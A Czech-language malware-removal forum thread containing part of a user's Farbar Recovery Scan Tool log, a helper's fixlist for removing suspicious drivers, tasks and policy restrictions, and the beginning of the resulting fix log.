S4 RsFx0310; C:\Windows\System32\DRIVERS\RsFx0310.sys [249024 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [7947096 2019-05-08] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 rzendpt; C:\Windows\System32\DRIVERS\rzendpt.sys [51224 2016-05-12] (Razer USA Ltd. -> Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer Inc. -> Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-09-07] (Razer Inc. -> Razer, Inc.)
R3 SbieDrv; D:\windows programy\Sandboxie-Plus\SbieDrv.sys [249368 2022-08-29] (Microsoft Windows Hardware Compatibility Publisher -> Sandboxie-Plus.com)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [40664 2015-02-03] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [39864 2020-04-06] (ProtonVPN AG -> The OpenVPN Project)
R3 VBAudioVMAUXVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmauxvaio64_win7.sys [41192 2019-01-06] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBAudioVMVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmvaio64_win7.sys [41192 2019-01-05] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [239432 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [249344 2020-10-16] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135768 2016-06-28] (Oracle Corporation -> Oracle Corporation)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [22216888 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R1 vmkbd3; C:\Windows\System32\DRIVERS\vmkbd.sys [52288 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R2 VMnetBridge; C:\Windows\System32\DRIVERS\vmnetbridge.sys [66368 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R3 VOICEMOD_Driver; C:\Windows\System32\drivers\vmdrv.sys [31744 2021-12-28] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider)
R0 vsock; C:\Windows\System32\DRIVERS\vsock.sys [103736 2019-08-14] (VMware, Inc. -> VMware, Inc.)
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-x64.sys [52576 2018-02-28] (VMware, Inc. -> VMware, Inc.)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (NGO -> MBB)
R2 WebDriveFSD; C:\Program Files\WebDrive\wdfsd.sys [108960 2018-09-25] (South River Technologies -> South River Technologies, Inc.)
R3 wovad_micarray; C:\Windows\System32\drivers\womic.sys [35696 2017-11-25] (Beijing Wolicheng Technology Co., Ltd. -> Windows (R) Win 7 DDK provider)
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 glavcam; system32\DRIVERS\glavcam.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-24 23:31 - 2023-11-24 23:31 - 000003116 _____ C:\Windows\system32\Tasks\AdwCleaner_onReboot
2023-11-24 09:11 - 2023-11-24 09:11 - 000016451 _____ C:\Users\John\Desktop\malware.txt
2023-11-23 21:18 - 2023-11-25 10:19 - 000000000 ____D C:\Users\John\AppData\Local\Malwarebytes
2023-11-23 21:18 - 2023-11-23 21:18 - 000000812 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2023-11-23 21:18 - 2023-11-23 21:18 - 000000812 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2023-11-23 21:07 - 2023-11-23 21:07 - 000083385 _____ C:\Users\John\Downloads\Addition.zip
2023-11-23 19:29 - 2023-11-23 19:29 - 002383872 _____ (Farbar) C:\Users\John\Downloads\FRST64.exe
2023-11-23 19:27 - 2023-11-23 19:27 - 000000021 _____ C:\Users\John\Desktop\forum viry ucet.txt
2023-11-22 15:23 - 2023-11-22 15:23 - 012383864 _____ (Tim Kosse) C:\Users\John\Downloads\FileZilla_3.66.1_win64-setup.exe
2023-11-22 03:28 - 2023-11-22 03:28 - 000000089 _____ C:\Users\John\Desktop\txt.txt
2023-11-20 22:32 - 2023-11-22 11:41 - 000000131 _____ C:\Users\John\Desktop\praxe chill.txt
2023-11-18 21:58 - 2023-11-18 21:58 - 000731283 _____ C:\Users\John\Downloads\F3-BP-2015-Skrivan-Jaroslav-Bakalarka.pdf
2023-11-18 21:55 - 2023-11-18 21:55 - 000051947 _____ C:\Users\John\Downloads\white-paper-php-performance-checklist.pdf
2023-11-18 21:02 - 2023-11-18 21:02 - 001282692 _____ C:\Users\John\Downloads\Server-Side_Lookup_Optimization_of_A_Web_Service.pdf
2023-11-16 18:50 - 2023-11-16 18:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-Link
2023-11-16 18:49 - 2023-11-16 18:49 - 000000000 ____D C:\Program Files (x86)\TP-Link
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\Drivers\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 001185504 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\Rtlihvs.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000114920 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\RtlExtUI.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000049384 _____ (Windows (R) Server 2003 DDK provider) C:\Windows\system32\rtlCoInst.dll
2023-11-16 18:48 - 2023-11-16 18:49 - 000000000 ____D C:\Users\John\AppData\Local\TP-Link
2023-11-16 18:48 - 2023-11-16 18:48 - 000000000 ____D C:\ProgramData\TP-Link
2023-11-15 08:15 - 2023-11-14 14:28 - 000587065 _____ C:\Users\John\cviko2_231004.ipynb
2023-11-15 08:15 - 2023-11-14 14:28 - 000447921 _____ C:\Users\John\cviko231018.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000629594 _____ C:\Users\John\cviko20231108.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000317529 _____ C:\Users\John\Untitled1.ipynb
2023-11-13 17:48 - 2023-11-13 17:48 - 000001366 _____ C:\Users\John\Desktop\team1 laravel.ffs_gui
2023-11-11 15:50 - 2023-11-11 15:50 - 000000000 ____D C:\Users\John\.mputils
2023-11-10 09:40 - 2023-11-10 09:40 - 000262144 _____ C:\Windows\Minidump\111023-100277-01.dmp
2023-11-07 01:17 - 2023-11-07 01:17 - 000001057 _____ C:\Users\John\Desktop\WinHugs.lnk
2023-11-07 01:17 - 2023-11-07 01:17 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinHugs
2023-11-07 01:15 - 2023-11-07 01:17 - 000000000 ____D C:\Program Files (x86)\WinHugs
2023-11-03 17:27 - 2023-11-03 17:27 - 000002468 _____ C:\Users\John\Desktop\moje upraveny arduno.txt
2023-11-03 12:46 - 2023-11-03 12:21 - 000006143 _____ C:\HTTPClient.cpp
2023-11-03 12:46 - 2023-10-31 21:58 - 000001218 _____ C:\HTTPClient.h
2023-11-03 12:46 - 2023-10-26 13:56 - 000001987 _____ C:\wifly_http.ino
2023-11-03 12:46 - 2023-10-26 13:56 - 000000182 _____ C:\Debug.h
2023-11-02 03:24 - 2023-11-02 03:24 - 003243838 _____ C:\Users\John\Desktop\lol ucet.psd
2023-11-01 13:36 - 2023-11-01 13:36 - 000000339 _____ C:\Users\John\Desktop\nove regexy pre opgg.txt
2023-10-26 19:17 - 2023-10-26 19:23 - 000000000 ____D C:\Users\John\AppData\Local\playit_gg
2023-10-26 19:17 - 2023-10-26 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Playit.gg
2023-10-26 13:50 - 2023-11-09 09:37 - 000000000 ____D C:\Users\John\AppData\Local\Arduino15
2023-10-26 13:50 - 2023-10-26 13:57 - 000000000 ____D C:\Users\John\Documents\Arduino
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\Users\Public\Desktop\Arduino.lnk
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-25 11:53 - 2018-05-27 13:28 - 000047211 _____ C:\Users\John\Downloads\FRST.txt
2023-11-25 11:52 - 2017-02-03 15:18 - 000000000 ____D C:\FRST
2023-11-25 10:56 - 2022-09-30 08:56 - 000000000 ____D C:\Users\John\AppData\Roaming\superProductivity
2023-11-25 10:55 - 2020-07-28 11:17 - 000000000 ____D C:\Users\John\AppData\Local\Discord
2023-11-25 10:55 - 2018-07-28 23:15 - 000000000 ____D C:\Users\John\AppData\Roaming\discord
2023-11-25 10:26 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2023-11-25 10:26 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2023-11-25 10:25 - 2018-06-28 19:47 - 000000000 ____D C:\Users\John\AppData\Local\LogMeIn Hamachi
2023-11-25 10:21 - 2009-07-14 06:13 - 001061310 _____ C:\Windows\system32\PerfStringBackup.INI
2023-11-25 10:21 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2023-11-25 10:20 - 2017-06-12 11:10 - 000000000 ____D C:\ProgramData\VMware
2023-11-25 10:19 - 2016-06-04 15:16 - 000000000 ____D C:\Program Files (x86)\Google
2023-11-25 10:17 - 2020-04-15 23:16 - 000000001 _____ C:\Windows\vgkbootstatus.dat
2023-11-25 10:16 - 2020-11-29 22:35 - 000000000 ____D C:\ProgramData\VirtualBox
2023-11-25 10:16 - 2019-02-03 09:09 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2023-11-25 10:16 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2023-11-25 04:12 - 2016-06-04 16:02 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2023-11-24 09:12 - 2019-01-08 15:42 - 000034241 _____ C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2023-11-24 09:12 - 2016-06-05 17:45 - 000000000 ____D C:\Users\John\AppData\Roaming\TS3Client
2023-11-23 21:16 - 2021-07-29 16:20 - 000000000 ____D C:\ProgramData\Malwarebytes
2023-11-23 21:07 - 2018-05-27 13:31 - 000363316 _____ C:\Users\John\Downloads\Addition.txt
2023-11-23 11:58 - 2017-02-21 16:47 - 000000000 ____D C:\Users\John\AppData\Roaming\obs-studio
2023-11-23 10:32 - 2021-07-29 08:59 - 000000400 __RSH C:\ProgramData\ntuser.pol
2023-11-22 21:38 - 2016-09-10 17:45 - 000000000 ____D C:\Program Files (x86)\Opera
2023-11-22 16:15 - 2016-08-21 23:14 - 000000000 ____D C:\Users\John\AppData\Roaming\FileZilla
2023-11-22 15:32 - 2022-01-09 22:28 - 000000000 ____D C:\Users\John\AppData\Roaming\Signal
2023-11-22 12:42 - 2022-05-28 18:10 - 000000000 ____D C:\Users\John\AppData\Roaming\ImageGlass
2023-11-22 11:43 - 2018-03-11 14:57 - 000228136 _____ C:\Users\John\AppData\Local\GDIPFONTCACHEV1.DAT
2023-11-22 10:41 - 2018-03-12 09:31 - 005633824 _____ C:\Windows\system32\FNTCACHE.DAT
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Roaming\VMware
2023-11-22 03:27 - 2017-06-12 11:19 - 000000000 ____D C:\Users\John\AppData\Local\VMware
2023-11-21 16:56 - 2021-07-20 10:12 - 000003832 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1473525916
2023-11-20 22:31 - 2023-01-23 13:25 - 000000000 ____D C:\Users\John\AppData\Local\KeePassXC
2023-11-19 20:02 - 2016-06-05 14:18 - 000000000 ____D C:\ProgramData\Riot Games
2023-11-19 14:33 - 2019-01-31 03:33 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2023-11-17 14:27 - 2021-03-31 18:56 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\PowerPoint
2023-11-17 11:42 - 2021-03-29 12:13 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Excel
2023-11-17 11:37 - 2016-06-04 15:16 - 000000000 ____D C:\Users\John\AppData\Local\Deployment
2023-11-16 19:24 - 2016-06-04 16:36 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent
2023-11-16 19:21 - 2019-06-04 22:22 - 000000000 ____D C:\Users\John\AppData\Local\BitTorrentHelper
2023-11-16 19:03 - 2020-01-06 15:07 - 000000000 ____D C:\Users\John\AppData\Roaming\uTorrent 2.2
2023-11-16 19:00 - 2020-03-13 19:30 - 000000000 ____D C:\Users\John\AppData\Local\CrashDumps
2023-11-16 18:59 - 2019-10-01 14:26 - 000000000 ____D C:\Users\John\AppData\Roaming\Wireshark
2023-11-16 18:49 - 2018-05-27 10:31 - 000000000 ____D C:\Temp
2023-11-16 18:49 - 2016-06-04 15:09 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2023-11-15 23:27 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Postman
2023-11-15 21:52 - 2020-07-24 18:13 - 000045056 _____ C:\Users\John\.wakatime.db
2023-11-15 21:52 - 2016-06-04 14:57 - 000000000 ____D C:\Users\John
2023-11-15 08:19 - 2023-01-22 15:03 - 000000000 ____D C:\Users\John\AppData\Roaming\Python
2023-11-15 08:13 - 2017-02-20 12:40 - 000000000 ____D C:\Users\John\New folder
2023-11-14 08:45 - 2023-03-21 20:28 - 000003628 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
2023-11-14 08:45 - 2023-03-21 20:28 - 000003500 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
2023-11-13 18:14 - 2023-04-23 11:37 - 000002106 _____ C:\Users\John\Desktop\Postman.lnk
2023-11-13 18:14 - 2023-04-23 11:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Postman
2023-11-11 21:28 - 2020-12-14 00:48 - 000138240 ___SH C:\Users\John\Documents\Thumbs.db
2023-11-11 15:50 - 2023-04-02 11:22 - 000000000 ____D C:\Users\John\AppData\Roaming\.minecraft
2023-11-11 15:41 - 2020-03-17 01:47 - 000000000 ____D C:\Users\John\AppData\Roaming\.tlauncher
2023-11-10 09:40 - 2016-07-24 21:43 - 000000000 ____D C:\Windows\Minidump
2023-11-09 14:45 - 2023-05-01 10:15 - 000000000 ____D C:\Users\John\AppData\Local\Postman
2023-11-07 22:21 - 2021-01-20 14:37 - 000000000 ____D C:\Users\John\AppData\Roaming\Authy Desktop
2023-11-03 13:22 - 2017-12-14 02:01 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Word
2023-11-02 12:01 - 2022-12-08 13:49 - 000000112 _____ C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2023-11-02 00:39 - 2023-09-05 22:43 - 001042153 ____N C:\Windows\Minidump\110223-103491-01.dmp
2023-10-27 18:21 - 2021-04-04 12:00 - 000003434 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2023-10-27 18:21 - 2021-04-04 12:00 - 000003306 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore

==================== Files in the root of some directories ========

2020-05-03 14:07 - 2020-05-03 14:07 - 000000048 ____H () C:\Program Files (x86)\8iq24splw1.dat
2018-12-26 11:13 - 2023-08-12 09:04 - 000000033 _____ () C:\Users\John\AppData\Roaming\AdobeWLCMCache.dat
2020-06-18 22:09 - 2020-06-18 22:09 - 000000068 _____ () C:\Users\John\AppData\Roaming\changzhi_leidian.data
2019-07-14 00:42 - 2020-06-27 12:52 - 000000808 _____ () C:\Users\John\AppData\Roaming\jd-gui.cfg
2018-12-26 11:41 - 2021-07-13 10:52 - 000000028 _____ () C:\Users\John\AppData\Roaming\kulerdata.json
2022-12-08 13:49 - 2023-11-02 12:01 - 000000112 _____ () C:\Users\John\AppData\Roaming\Předvolby CS6 pro JP2K
2022-09-04 13:34 - 2022-09-04 13:34 - 000000142 ___SH () C:\Users\John\AppData\Roaming\UOD.DAT
2019-01-08 15:42 - 2023-11-24 09:12 - 000034241 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterBananaDefault.xml
2019-01-05 02:03 - 2019-01-06 17:26 - 000004634 _____ () C:\Users\John\AppData\Roaming\VoiceMeeterDefault.xml
2022-07-29 00:24 - 2022-07-29 00:24 - 000000142 ___SH () C:\Users\John\AppData\Roaming\YINSLITO.DLL
2022-09-04 17:34 - 2022-09-04 17:34 - 000000142 ___SH () C:\Users\John\AppData\Local\700937146F5B4E19A662A91210046348.rct
2016-11-26 21:00 - 2019-10-04 07:27 - 000001480 _____ () C:\Users\John\AppData\Local\Adobe Uložit pro web 13.0 Prefs
2018-09-06 08:27 - 2018-09-06 08:27 - 000001111 _____ () C:\Users\John\AppData\Local\gamma_ramp.reg
2018-01-28 23:40 - 2023-09-28 14:32 - 000000600 _____ () C:\Users\John\AppData\Local\PUTTY.RND
2021-11-18 10:20 - 2021-11-18 10:20 - 000002939 _____ () C:\Users\John\AppData\Local\recently-used.xbel
2018-07-27 13:26 - 2018-07-27 13:26 - 000000487 _____ () C:\Users\John\AppData\Local\ReclaiMe.config
2017-06-16 14:06 - 2023-10-23 21:37 - 000007665 _____ () C:\Users\John\AppData\Local\Resmon.ResmonCfg
2019-03-04 16:27 - 2019-03-04 16:27 - 000000003 _____ () C:\Users\John\AppData\Local\updater.log
2019-03-04 16:27 - 2019-03-04 16:27 - 000000425 _____ () C:\Users\John\AppData\Local\UserProducts.xml

==================== FLock ==============================

2017-10-27 23:09 C:\Windows\infpub.dat

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-09-04 01:24
==================== End of FRST.txt ========================

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 25 lis 2023 15:35
od Rudy
Otevřte poznámkový blok a zkopírujte do něj:
Start

CloseProcesses:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {AC5DCEC8-7ADC-420A-928F-2E4D77508D8B} - System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {795E77E3-0EEC-4504-9D64-C02F56BB6298} - System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2016-06-04] (Google Inc -> Google Inc.)
Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
C:\Program Files (x86)\8iq24splw1.dat
C:\Users\John\AppData\Roaming\changzhi_leidian.data
ContextMenuHandlers1: [GDContextMenu] -> [CC]{BB02B294-8425-42E5-983F-41A1FA970CD6} => -> No File
ContextMenuHandlers1: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers4: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers1_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
ContextMenuHandlers6_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
AlternateDataStreams: C:\Windows\system32\-1.14-windows.xml:B72225CA78 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0:74DBE02D40 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0:23D10F59A6 [10]
AlternateDataStreams: C:\Windows\system32\AcpiServiceVnA64.dll:ECA79956BD [10]
AlternateDataStreams: C:\ProgramData\DP45977C.lfl:677104FCAA [10]
AlternateDataStreams: C:\ProgramData\ReclaiMe.config:AC4DBEED78 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk:8ACB4E955C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk:D8006AA692 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk:0E0659E205 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk:37833A1060 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk:38307C6C28 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk:DAEDFEEC9C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk:742FE07988 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk:6306D2B3A2 [10]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [83]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [2716]
FirewallRules: [{381E8692-D05F-4768-A03E-BFB42D82C8D3}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{030F7113-6734-41CD-A4E5-D34B67B56903}] => (Block) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [{5990ECB6-4B3B-4441-A614-264DCBBF16F2}] => (Allow) I:\windows programy\davinci\ElementsPanelDaemon.exe => No File
FirewallRules: [{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}] => (Allow) I:\windows programy\davinci\OxygenPanelDaemon.exe => No File
FirewallRules: [{257BE348-CCF6-4567-A911-19F0393770BC}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe => No File

EmptyTemp:
Hosts:
End
Uložte do C:\Users\John\Downloads jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.

Re: Prihlasovanie do FB, otvaranie okien v browseri

Napsal: 18 úno 2024 10:26
od mivefe5888
Fix result of Farbar Recovery Scan Tool (x64) Version: 16.02.2024
Ran by John (18-02-2024 10:10:50) Run:12
Running from C:\Users\John\Downloads
Loaded Profiles: John & Test
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start

CloseProcesses:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
